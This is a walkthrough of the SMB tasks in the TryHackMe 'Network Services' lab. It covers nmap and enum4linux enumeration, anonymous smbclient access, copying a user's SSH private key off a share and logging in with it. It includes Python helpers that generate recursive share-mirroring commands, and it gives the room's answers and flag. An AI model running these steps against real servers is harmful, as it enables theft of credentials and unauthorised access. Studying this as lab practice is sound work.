TryHackMe Network Services

TryHackMe has been an awesome platform for learning hacking and security from the very basics. The Network Services room covers the usual culprits: SMB, Telnet and FTP. Let's understand and solve the SMB part.

Network Service Room Link – https://tryhackme.com/room/networkservices
Tasks associated with SMB –
Task 2  Understanding SMB
Task 3  Enumerating SMB
Task 4  Exploiting SMB

Task 3

We use nmap and enum4linux for this. Note that enum4linux's "do all simple enumeration" flag is lowercase -a; the uppercase -A in the transcript below is rejected ("Unknown option: A"), but when no valid option is given enum4linux runs that same full enumeration by default, so the output is still complete.

An nmap scan is the first step in nearly every CTF-style challenge. The task asks for all open ports, which is what -p- does in the scan below; a default scan covers only the 1000 most common ports and can miss a service listening elsewhere.

┌──(abhinav㉿ETHICALHACKX)-[~]
└─$ sudo nmap -sV -A 10.10.232.67 -p-
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-19 20:18 EDT
Nmap scan report for 10.10.232.67
Host is up (0.19s latency).

PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 91:df:5c:7c:26:22:6e:90:23:a7:7d:fa:5c:e1:c2:52 (RSA)
|   256 86:57:f5:2a:f7:86:9c:cf:02:c1:ac:bc:34:90:6b:01 (ECDSA)
|_  256 81:e3:cc:e7:c9:3c:75:d7:fb:e0:86:a0:01:41:77:81 (ED25519)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 2.6.32 (92%), Linux 2.6.39 - 3.2 (92%), Linux 3.1 - 3.2 (92%), Linux 3.2 - 4.9 (92%), Linux 3.5 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: POLOSMB; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_nbstat: NetBIOS name: POLOSMB, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: polosmb
|   NetBIOS computer name: POLOSMB\x00
|   Domain name: \x00
|   FQDN: polosmb
|_  System time: 2021-05-20T00:18:22+00:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-05-20T00:18:22
|_  start_date: N/A

TRACEROUTE (using port 22/tcp)
HOP RTT       ADDRESS
1   190.54 ms 10.8.0.1
2   190.72 ms 10.10.232.67

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.04 seconds
┌──(abhinav㉿ETHICALHACKX)-[~]
└─$ sudo enum4linux -A 10.10.232.67
[sudo] password for abhinav: 
Unknown option: A
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed May 19 19:25:31 2021

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 10.10.232.67
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ==================================================== 
|    Enumerating Workgroup/Domain on 10.10.232.67    |
 ==================================================== 
[+] Got domain/workgroup name: WORKGROUP

 ============================================ 
|    Nbtstat Information for 10.10.232.67    |
 ============================================ 
Looking up status of 10.10.232.67
	POLOSMB         <00> -         B <ACTIVE>  Workstation Service
	POLOSMB         <03> -         B <ACTIVE>  Messenger Service
	POLOSMB         <20> -         B <ACTIVE>  File Server Service
	..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser
	WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
	WORKGROUP       <1d> -         B <ACTIVE>  Master Browser
	WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections

	MAC Address = 00-00-00-00-00-00

 ===================================== 
|    Session Check on 10.10.232.67    |
 ===================================== 
[+] Server 10.10.232.67 allows sessions using username '', password ''

 =========================================== 
|    Getting domain SID for 10.10.232.67    |
 =========================================== 
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup

 ====================================== 
|    OS information on 10.10.232.67    |
 ====================================== 
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 10.10.232.67 from smbclient: 
[+] Got OS info for 10.10.232.67 from srvinfo:
	POLOSMB        Wk Sv PrQ Unx NT SNT polosmb server (Samba, Ubuntu)
	platform_id     :	500
	os version      :	6.1
	server type     :	0x809a03

 ============================= 
|    Users on 10.10.232.67    |
 ============================= 
Use of uninitialized value $users in print at ./enum4linux.pl line 874.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 877.

Use of uninitialized value $users in print at ./enum4linux.pl line 888.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 890.

 ========================================= 
|    Share Enumeration on 10.10.232.67    |
 ========================================= 

	Sharename       Type      Comment
	---------       ----      -------
	netlogon        Disk      Network Logon Service
	profiles        Disk      Users profiles
	print$          Disk      Printer Drivers
	IPC$            IPC       IPC Service (polosmb server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available

[+] Attempting to map shares on 10.10.232.67
//10.10.232.67/netlogon	[E] Can't understand response:
tree connect failed: NT_STATUS_BAD_NETWORK_NAME
//10.10.232.67/profiles	Mapping: OK, Listing: OK
//10.10.232.67/print$	Mapping: DENIED, Listing: N/A
//10.10.232.67/IPC$	[E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*

 ==================================================== 
|    Password Policy Information for 10.10.232.67    |
 ==================================================== 


[+] Attaching to 10.10.232.67 using a NULL share

[+] Trying protocol 139/SMB...

[+] Found domain(s):

	[+] POLOSMB
	[+] Builtin

[+] Password Info for Domain: POLOSMB

	[+] Minimum password length: 5
	[+] Password history length: None
	[+] Maximum password age: 37 days 6 hours 21 minutes 
	[+] Password Complexity Flags: 000000

		[+] Domain Refuse Password Change: 0
		[+] Domain Password Store Cleartext: 0
		[+] Domain Password Lockout Admins: 0
		[+] Domain Password No Clear Change: 0
		[+] Domain Password No Anon Change: 0
		[+] Domain Password Complex: 0

	[+] Minimum password age: None
	[+] Reset Account Lockout Counter: 30 minutes 
	[+] Locked Account Duration: 30 minutes 
	[+] Account Lockout Threshold: None
	[+] Forced Log off Time: 37 days 6 hours 21 minutes 


[+] Retieved partial password policy with rpcclient:

Password Complexity: Disabled
Minimum Password Length: 5


 ============================== 
|    Groups on 10.10.232.67    |
 ============================== 

[+] Getting builtin groups:

[+] Getting builtin group memberships:

[+] Getting local groups:

[+] Getting local group memberships:

[+] Getting domain groups:

[+] Getting domain group memberships:

 ======================================================================= 
|    Users on 10.10.232.67 via RID cycling (RIDS: 500-550,1000-1050)    |
 ======================================================================= 
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-434125608-3964652802-3194254534
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-500 *unknown*\*unknown* (8)
S-1-5-32-501 *unknown*\*unknown* (8)
S-1-5-32-502 *unknown*\*unknown* (8)
S-1-5-32-503 *unknown*\*unknown* (8)
..
..
S-1-5-32-543 *unknown*\*unknown* (8)
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
S-1-5-32-1000 *unknown*\*unknown* (8)
S-1-5-32-1001 *unknown*\*unknown* (8)
S-1-5-32-1002 *unknown*\*unknown* (8)
..
..
S-1-5-32-1040 *unknown*\*unknown* (8)
S-1-5-32-1041 *unknown*\*unknown* (8)
[+] Enumerating users using SID S-1-5-21-434125608-3964652802-3194254534 and logon username '', password ''
S-1-5-21-434125608-3964652802-3194254534-514 *unknown*\*unknown* (8)
S-1-5-21-434125608-3964652802-3194254534-515 *unknown*\*unknown* (8)
S-1-5-21-434125608-3964652802-3194254534-516 *unknown*\*unknown* (8)
..
..
S-1-5-21-434125608-3964652802-3194254534-550 *unknown*\*unknown* (8)
S-1-5-21-434125608-3964652802-3194254534-1000 *unknown*\*unknown* (8)
S-1-5-21-434125608-3964652802-3194254534-1001 *unknown*\*unknown* (8)
S-1-5-21-434125608-3964652802-3194254534-1002 *unknown*\*unknown* (8)
..
..
S-1-5-21-434125608-3964652802-3194254534-1046 *unknown*\*unknown* (8)
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''


 ============================================= 
|    Getting printer info for 10.10.232.67    |
 ============================================= 
No printers returned.


enum4linux complete on Wed May 19 19:43:45 2021

┌──(abhinav㉿ETHICALHACKX)-[~]
└─$ 

Conduct an nmap scan of your choosing, How many ports are open?
From the above results we can observe we have 3 ports open – 22,139,445

What ports is SMB running on?
139 and 445, as the nmap output says out loud (445 is SMB directly over TCP, 139 is SMB over NetBIOS).

Let’s get started with Enum4Linux, conduct a full basic enumeration. For starters, what is the workgroup name? 
WORKGROUP from enum4linux

What comes up as the name of the machine?   
POLOSMB from enum4linux

What operating system version is running?    
6.1, from the OS information section of the enum4linux output (srvinfo). That is the Windows-style version Samba reports to clients, not the real host version; the SSH banner (OpenSSH 7.6p1 Ubuntu 4ubuntu0.3) is the better hint that this is Ubuntu 18.04, which the later login confirms.

What share sticks out as something we might want to investigate? 
profiles, from the share enumeration section: it is the only share that both maps and lists with a null session (Mapping: OK, Listing: OK), and its comment "Users profiles" suggests home directories.
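As an added example (not code from the room, nmap or enum4linux), the script below pulls the answers to these questions out of the captured output programmatically: the open ports, which of them carry SMB, whether SMB signing is enforced (nmap's "enabled but not required" is the Samba default and is what makes SMB relay possible), and which shares a null session can actually list. It then prints the non-interactive smbclient one-liners to mirror those shares. The two sample strings are trimmed copies of the output above; the output directory name loot is an assumption.

```python
"""Triage SMB enumeration output: open ports, whether SMB signing is
enforced, and which shares a null session can actually list.

Added example for this walkthrough; it is not code from the TryHackMe
room, nmap or enum4linux. The two samples are trimmed copies of the scan
output on this page, and the regexes assume the formats those versions
print (Nmap 7.91, enum4linux 0.8.9). The 'loot' directory is an assumption.
"""
import re

# Constructed sample: trimmed copy of the nmap output above.
NMAP_OUTPUT = """\
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Host script results:
| smb-security-mode:
|   account_used: guest
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
"""

# Constructed sample: trimmed copy of the enum4linux share-mapping block above
# (enum4linux separates the share path from its verdict with a tab).
ENUM4LINUX_OUTPUT = (
    "[+] Attempting to map shares on 10.10.232.67\n"
    "//10.10.232.67/netlogon\t[E] Can't understand response:\n"
    "tree connect failed: NT_STATUS_BAD_NETWORK_NAME\n"
    "//10.10.232.67/profiles\tMapping: OK, Listing: OK\n"
    "//10.10.232.67/print$\tMapping: DENIED, Listing: N/A\n"
    "//10.10.232.67/IPC$\t[E] Can't understand response:\n"
    "NT_STATUS_OBJECT_NAME_NOT_FOUND listing \\*\n"
)

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+(\S+)", re.M)
SHARE_RE = re.compile(
    r"^//(?P<host>[^/\s]+)/(?P<share>\S+)\s+"
    r"Mapping:\s*(?P<map>\w+),\s*Listing:\s*(?P<list>\S+)",
    re.M,
)
SMB_PORTS = {139, 445}


def open_ports(nmap_text):
    """{port: service} for every line nmap reports as open."""
    return {int(m.group(1)): m.group(3) for m in PORT_RE.finditer(nmap_text)}


def smb_ports(nmap_text):
    """Open ports that carry SMB (445 direct, 139 over NetBIOS)."""
    return sorted(p for p in open_ports(nmap_text) if p in SMB_PORTS)


def signing_required(nmap_text):
    """True only if the smb2-security-mode script says signing is required.
    'enabled but not required' is the Samba default and leaves the server
    exposed to SMB relay, so it is reported as False. None = script absent."""
    m = re.search(r"smb2-security-mode:[\s\S]*?Message signing ([^\n]+)", nmap_text)
    if not m:
        return None
    status = m.group(1).strip()
    return "required" in status and "not required" not in status


def share_map(enum_text):
    """{share: (host, mapping, listing)} from enum4linux's share-mapping block.
    Shares that produced an error line instead of a verdict are left out."""
    return {m["share"]: (m["host"], m["map"], m["list"]) for m in SHARE_RE.finditer(enum_text)}


def anonymous_shares(enum_text):
    """(host, share) pairs a null session can both connect to and list."""
    return [(host, share) for share, (host, mp, ls) in share_map(enum_text).items()
            if mp == "OK" and ls == "OK"]


def fetch_commands(enum_text, out_dir="loot"):
    """Non-interactive smbclient one-liners that mirror each listable share:
    -N sends an empty password without prompting, -c runs the quoted
    commands and exits; recurse/prompt make mget walk subdirectories
    (such as .ssh) without asking per file."""
    return [
        f"mkdir -p {out_dir} && smbclient //{host}/{share} -N "
        f"-c 'lcd {out_dir}; recurse ON; prompt OFF; mget *'"
        for host, share in anonymous_shares(enum_text)
    ]


if __name__ == "__main__":
    print("open ports:", open_ports(NMAP_OUTPUT))
    print("SMB on:", smb_ports(NMAP_OUTPUT))
    print("SMB signing required:", signing_required(NMAP_OUTPUT))
    for host, share in anonymous_shares(ENUM4LINUX_OUTPUT):
        print("anonymous share:", f"//{host}/{share}")
    for cmd in fetch_commands(ENUM4LINUX_OUTPUT):
        print(cmd)
```

Run it as-is to see the triage of the captured output; to use it on a fresh target, replace the two sample strings with the real nmap and enum4linux output (or read them from files). The generated smbclient command is the non-interactive equivalent of the session shown next, and because files that deny read (like authorized_keys here) are simply skipped by mget, check the local copy against the remote listing afterwards.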

┌──(abhinav㉿ETHICALHACKX)-[~]
└─$ smbclient //10.10.232.67/profiles -U Anonymous
Enter WORKGROUP\Anonymous's password: 
Try "help" to get a list of possible commands.
smb: \> get "Working From Home Information.txt"
getting file \Working From Home Information.txt of size 358 as Working From Home Information.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)
smb: \> help
?              allinfo        altname        archive        backup         
blocksize      cancel         case_sensitive cd             chmod          
chown          close          del            deltree        dir            
du             echo           exit           get            getfacl        
geteas         hardlink       help           history        iosize         
lcd            link           lock           lowercase      ls             
l              mask           md             mget           mkdir          
more           mput           newer          notify         open           
posix          posix_encrypt  posix_open     posix_mkdir    posix_rmdir    
posix_unlink   posix_whoami   print          prompt         put            
pwd            q              queue          quit           readlink       
rd             recurse        reget          rename         reput          
rm             rmdir          showacls       setea          setmode        
scopy          stat           symlink        tar            tarmode        
timeout        translate      unlock         volume         vuid           
wdel           logon          listconnect    showconnect    tcon           
tdis           tid            utimes         logoff         ..             
!              

smb: \> ls
  .                                   D        0  Tue Apr 21 07:08:23 2020
  ..                                  D        0  Tue Apr 21 06:49:56 2020
  .cache                             DH        0  Tue Apr 21 07:08:23 2020
  .profile                            H      807  Tue Apr 21 07:08:23 2020
  .sudo_as_admin_successful           H        0  Tue Apr 21 07:08:23 2020
  .bash_logout                        H      220  Tue Apr 21 07:08:23 2020
  .viminfo                            H      947  Tue Apr 21 07:08:23 2020
  Working From Home Information.txt      N      358  Tue Apr 21 07:08:23 2020
  .ssh                               DH        0  Tue Apr 21 07:08:23 2020
  .bashrc                             H     3771  Tue Apr 21 07:08:23 2020
  .gnupg                             DH        0  Tue Apr 21 07:08:23 2020

		12316808 blocks of size 1024. 7584016 blocks available
smb: \> cd .ssh
smb: \.ssh\> ls
  .                                   D        0  Tue Apr 21 07:08:23 2020
  ..                                  D        0  Tue Apr 21 07:08:23 2020
  id_rsa                              A     1679  Tue Apr 21 07:08:23 2020
  id_rsa.pub                          N      396  Tue Apr 21 07:08:23 2020
  authorized_keys                     N        0  Tue Apr 21 07:08:23 2020

		12316808 blocks of size 1024. 7584016 blocks available
smb: \.ssh\> tar c thmNetwork.tar
NT_STATUS_ACCESS_DENIED opening remote file \.ssh\authorized_keys
tar: dumped 2 files and 0 directories
Total bytes written: 2075 (0.0 MiB/s)
smb: \.ssh\> 
┌──(abhinav㉿ETHICALHACKX)-[~/thm]
└─$ cat 'Working From Home Information.txt' 
John Cactus,

As you're well aware, due to the current pandemic most of POLO inc. has insisted that, wherever 
possible, employees should work from home. As such- your account has now been enabled with ssh
access to the main server.

If there are any problems, please contact the IT department at it@polointernalcoms.uk

Regards,

James
Department Manager 



┌──(abhinav㉿ETHICALHACKX)-[~/thm]
└─$ ls
 thmNetwork.tar  'Working From Home Information.txt'
┌──(abhinav㉿ETHICALHACKX)-[~/thm]
└─$ tar -xvf thmNetwork.tar 
./.ssh/id_rsa
./.ssh/id_rsa.pub


┌──(abhinav㉿ETHICALHACKX)-[~/thm/.ssh]
└─$ chmod 600 id_rsa
┌──(abhinav㉿ETHICALHACKX)-[~/thm/.ssh]
└─$ ls -la
total 16
drwxr-xr-x 2 abhinav abhinav 4096 May 19 20:59 .
drwxr-xr-x 3 abhinav abhinav 4096 May 19 20:59 ..
-rw------- 1 abhinav abhinav 1679 Apr 21  2020 id_rsa
-rw-r--r-- 1 abhinav abhinav  396 Apr 21  2020 id_rsa.pub


──(abhinav㉿ETHICALHACKX)-[~/thm/.ssh]
└─$ cat id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDb7OaL8zLZ5Z8OU3wZPSIQHaoyI8Yc3I/8/Y6faWgYTZbfNPexli0jxdAeTeGy2X3XACWcB4HFejbiNsMYLjy517gwWKPBvN865i8uIQ0Gqayq/KmBHpuBbR0yX/SpyfyvzR3VD16pg/D+WT8hLaNHSYm6FNYLsmVnWDSJDBhS179czftuoW55mw/OqzWVr5ln9cKeeuXlNV1lqCjBqF3ClzEBvN4JW8GS/riLTeHcXeMIMUTuIpr4XovN/VivIlLqTYy7lHuUh6L2RqAfw5+FSr4QZW1zHCMoS6FooTomq/03EGJCGcp80/fT0e04n+7+PxnmvZQkOwe1A1hUG6C/ cactus@polosmb


┌──(abhinav㉿ETHICALHACKX)-[~/thm/.ssh]
└─$ ssh -i id_rsa cactus@10.10.232.67
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-96-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Thu May 20 01:14:01 UTC 2021

  System load:  0.0                Processes:           94
  Usage of /:   33.3% of 11.75GB   Users logged in:     0
  Memory usage: 17%                IP address for eth0: 10.10.232.67
  Swap usage:   0%


22 packages can be updated.
0 updates are security updates.


Last login: Tue Apr 21 11:19:15 2020 from 192.168.1.110
cactus@polosmb:~$ ls -l
total 4
-rw-r--r-- 1 root root 20 Apr 21  2020 smb.txt
cactus@polosmb:~$ cat smb.txt 
THM{smb_is_fun_eh?}
cactus@polosmb:~$ 

Task 4

So we got in via smbclient with a null session (user Anonymous, empty password). We pulled the files we needed either by running get commands non-interactively with smbclient's -c option, or, as above, by bundling the .ssh directory with smbclient's tar command; note that authorized_keys was denied, which is why the archive holds only id_rsa and id_rsa.pub. Locally, the comment at the end of id_rsa.pub (cactus@polosmb) tells us the SSH username is cactus. After chmod 600 id_rsa (ssh refuses a private key that other users can read) we log in with ssh -i id_rsa cactus@MACHINE_IP; ls shows smb.txt and cat smb.txt gives the flag.
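Before trusting a recovered key it is worth checking that the copy is intact and noting its fingerprint: sshd logs the fingerprint of the key used for every login, so that value is exactly what an incident responder would search for afterwards. The script below is an added example, not part of the room or of OpenSSH; it parses the id_rsa.pub shown above with the standard library only, reads the username out of the key comment, builds the ssh command, and writes a private key with the 0600 mode ssh requires. The placeholder private-key text in check_install() is an assumption so that nothing here needs the real id_rsa.

```python
"""Check a recovered SSH key pair before using it: confirm the public key
is well-formed, take the username from its comment, compute the SHA256
fingerprint that sshd logs for each login, and write the private key with
the 0600 mode ssh insists on.

Added example for this walkthrough; not code from the TryHackMe room or
OpenSSH, and only the standard library is used. PUBKEY_LINE is the
id_rsa.pub printed on this page; the private-key text used by
check_install() is a placeholder, so nothing here needs the real id_rsa.
"""
import base64
import hashlib
import os
import struct
import tempfile

# Copied from the id_rsa.pub shown above (a single line in the real file).
PUBKEY_LINE = (
    "ssh-rsa "
    "AAAAB3NzaC1yc2EAAAADAQABAAABAQDb7OaL8zLZ5Z8OU3wZPSIQHaoyI8Yc3I/8/Y6faWgYTZbfNPexli"
    "0jxdAeTeGy2X3XACWcB4HFejbiNsMYLjy517gwWKPBvN865i8uIQ0Gqayq/KmBHpuBbR0yX/SpyfyvzR3V"
    "D16pg/D+WT8hLaNHSYm6FNYLsmVnWDSJDBhS179czftuoW55mw/OqzWVr5ln9cKeeuXlNV1lqCjBqF3C"
    "lzEBvN4JW8GS/riLTeHcXeMIMUTuIpr4XovN/VivIlLqTYy7lHuUh6L2RqAfw5+FSr4QZW1zHCMoS6"
    "FooTomq/03EGJCGcp80/fT0e04n+7+PxnmvZQkOwe1A1hUG6C/"
    " cactus@polosmb"
)


def _read_string(blob, off):
    """Decode one RFC 4251 'string': 4-byte big-endian length, then bytes."""
    if off + 4 > len(blob):
        raise ValueError("blob truncated")
    (n,) = struct.unpack(">I", blob[off:off + 4])
    if off + 4 + n > len(blob):
        raise ValueError("blob truncated")
    return blob[off + 4:off + 4 + n], off + 4 + n


def parse_pubkey(line):
    """Parse an OpenSSH public-key line into type, key size, comment and
    fingerprint. Raises ValueError when the type prefix and the type
    embedded in the blob disagree or the blob is cut short, which is what a
    damaged copy of a key looks like."""
    parts = line.strip().split(None, 2)
    if len(parts) < 2:
        raise ValueError("expected '<type> <base64> [comment]'")
    ktype, b64 = parts[0], parts[1]
    comment = parts[2] if len(parts) == 3 else ""
    blob = base64.b64decode(b64, validate=True)
    inner, off = _read_string(blob, 0)
    if inner.decode("ascii", "replace") != ktype:
        raise ValueError(f"type prefix {ktype!r} != embedded {inner!r}")
    bits = None
    if ktype == "ssh-rsa":
        _e, off = _read_string(blob, off)     # public exponent (mpint)
        n, off = _read_string(blob, off)      # modulus (mpint)
        bits = int.from_bytes(n, "big").bit_length()
    elif ktype == "ssh-ed25519":
        pub, off = _read_string(blob, off)    # raw 32-byte public point
        bits = len(pub) * 8
    else:
        off = len(blob)  # other types: structure beyond the type string not checked
    if off != len(blob):
        raise ValueError("trailing bytes after key material")
    user, _, host = comment.partition("@")
    # Same value `ssh-keygen -lf id_rsa.pub` prints: base64(SHA256(blob)) sans padding.
    fp = base64.b64encode(hashlib.sha256(blob).digest()).decode().rstrip("=")
    return {"type": ktype, "bits": bits, "comment": comment,
            "user": user, "host": host, "fingerprint": "SHA256:" + fp}


def ssh_command(pubkey_line, target, key_path="id_rsa"):
    """Build the login command from the username in the key's comment."""
    info = parse_pubkey(pubkey_line)
    if not info["user"]:
        raise ValueError("no user@host comment; get the username elsewhere")
    return f"ssh -i {key_path} {info['user']}@{target}"


def install_private_key(pem_text, path):
    """Write a private key readable only by its owner (ssh refuses keys with
    wider permissions) and return the resulting mode bits."""
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o600)
    with os.fdopen(fd, "w") as f:
        f.write(pem_text)
    os.chmod(path, 0o600)  # the file may have existed already with wider perms
    return os.stat(path).st_mode & 0o777


def check_install():
    """Round-trip a placeholder key through install_private_key in a temp dir."""
    placeholder = ("-----BEGIN OPENSSH PRIVATE KEY-----\n"
                   "placeholder, not a real key\n"
                   "-----END OPENSSH PRIVATE KEY-----\n")
    with tempfile.TemporaryDirectory() as d:
        return install_private_key(placeholder, os.path.join(d, "id_rsa"))


if __name__ == "__main__":
    info = parse_pubkey(PUBKEY_LINE)
    print(f"{info['type']} {info['bits']} bits, {info['fingerprint']}, user={info['user']}")
    print(ssh_command(PUBKEY_LINE, "10.10.232.67"))
    print("private key mode: %o" % check_install())
```

The fingerprint it prints should match ssh-keygen -lf id_rsa.pub on the same file; if it does not, the key was altered in transit (a line wrap or a dropped character, as happens when copying keys out of a web page) and the login will fail before you ever learn why. Only a user@host comment gives you the username; keys generated with ssh-keygen -C carry whatever the owner typed instead.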

What would be the correct syntax to access an SMB share called “secret” as user “suit” on a machine with the IP 10.10.10.2 on the default port?
smbclient //10.10.10.2/secret -U suit -p 445

Does the share allow anonymous access? Y/N?
Y

Great! Have a look around for any interesting documents that could contain valuable information. Who can we assume this profile folder belongs to?
John Cactus #from the Work From Home information.txt file

What service has been configured to allow him to work from home?
ssh # from the Work From home Information.txt file

Okay! Now we know this, what directory on the share should we look in?
.ssh #as now we know ssh keys might be present in ~/.ssh

This directory contains authentication keys that allow a user to authenticate themselves on, and then access, a server. Which of these keys is most useful to us?
id_rsa # the private key is what lets us authenticate; id_rsa.pub is only the public half (useful for the username in its comment), and authorized_keys was empty and not even readable

What is the smb.txt flag?
THM{smb_is_fun_eh?} # read the username from the comment in id_rsa.pub, ssh in with the private key, then ls and cat smb.txt

I will update the section on Telnet and FTP soon.
